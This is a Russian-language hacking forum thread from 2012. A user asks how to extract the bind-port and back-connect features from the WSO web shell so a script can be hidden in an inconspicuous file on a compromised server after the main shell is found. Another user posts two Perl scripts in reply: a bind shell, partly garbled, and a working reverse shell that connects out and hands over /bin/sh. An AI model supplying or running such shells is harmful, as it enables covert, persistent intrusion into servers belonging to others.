HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Бинд-порт
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.08.2012, 05:08
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию
В всо реализован встроенный биндпорт и бэк коннект.

Цитата:
Сообщение от None  
www-data 12657 0.0 0.0 21128 2564 ? S Aug28 0:00 perl /tmp/bp.pl 31337
www-data 28492 0.0 0.0 3956 580 ? S 04:01 0:00 sh -c ps aux | grep bp.pl
www-data 28494 0.0 0.0 3956 312 ? D 04:01 0:00 sh -c ps aux | grep bp.pl
Тоесть в темпе создается перловый скрипт, биндится порт и скрипт сносится, так?

Как вырезать эту штуку из всо для отдельного использования?

Например спалили шелл, удалили. А в какой-то неприметный файлик можно воткнуть этот скрипт.

Спасибо.
 
Ответить с цитированием

  #2  
Старый 30.08.2012, 08:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию
биндпорт

Код:
#!/usr/bin/perl

$SHELL="/bin/sh -i";

if (@ARGV &CONN";

		open STDERR,">&CONN";

		exec $SHELL || die print CONN "Cant execute $SHELL\n";

		close CONN;

	
	exit 0;

	}

}
бек.

Код:
#!/usr/bin/perl

use Socket;

$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");

$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");

open(STDIN, ">&SOCKET");

open(STDOUT, ">&SOCKET");

open(STDERR, ">&SOCKET");

system('/bin/sh -i');

close(STDIN);

close(STDOUT);

close(STDERR);
посмотрели бы исходники WSO, тела скриптов лежат внутри переменной, кодированные в base64
 
Ответить с цитированием

  #3  
Старый 01.09.2012, 03:30
RexelNet
Новичок
Регистрация: 21.10.2010
Сообщений: 21
Провел на форуме:
6589

Репутация: -5
По умолчанию
есть серв с забинденным портом , выбераю telnet , подключаюсь норм, но не выполняются команды , и не выводится результат что делать? был вариант искать рутнутый ssh Но так как нет в наличии таких, отпадает вариант, что посоветуете?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.